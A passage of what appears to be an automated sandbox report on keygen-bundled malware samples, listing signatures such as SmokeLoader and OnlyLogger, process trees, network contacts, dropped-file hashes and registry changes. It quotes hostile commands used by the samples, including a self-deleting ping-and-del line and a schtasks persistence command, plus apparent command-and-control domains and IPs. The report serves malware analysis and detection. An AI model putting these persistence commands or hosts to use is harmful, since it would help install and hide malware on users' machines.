| PID 2724 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2724 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2724 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
Files
memory/2648-0-0x00000000000F0000-0x0000000000108000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
138s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2164 wrote to memory of 4756 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2164 wrote to memory of 4756 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2164 wrote to memory of 4756 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243708 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/2164-0-0x0000000000400000-0x00000000004E5000-memory.dmp
memory/4756-12-0x0000000000D60000-0x0000000000E45000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jhuuee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp |
Files
memory/1552-0-0x000000007490E000-0x000000007490F000-memory.dmp
memory/1552-1-0x0000000000230000-0x0000000000406000-memory.dmp
\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/2972-26-0x0000000000200000-0x0000000000208000-memory.dmp
memory/2812-25-0x0000000001300000-0x0000000001320000-memory.dmp
memory/2816-24-0x000000013FE70000-0x000000013FE80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
memory/2812-39-0x0000000000140000-0x000000000015A000-memory.dmp
memory/2868-40-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/2816-43-0x0000000000560000-0x000000000056E000-memory.dmp
memory/876-50-0x000000013F550000-0x000000013F560000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/1980-61-0x000000013FA30000-0x000000013FA36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabFCF7.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarFD38.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"
Network
| Country | Destination | Domain | Proto |
| SG | 37.0.10.214:80 | tcp | |
| SG | 37.0.10.244:80 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| MX | 31.210.20.251:80 | tcp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
149s
Command Line
Signatures
SmokeLoader
Smokeloader family
Program crash
| Description | Indicator | Process | Target |
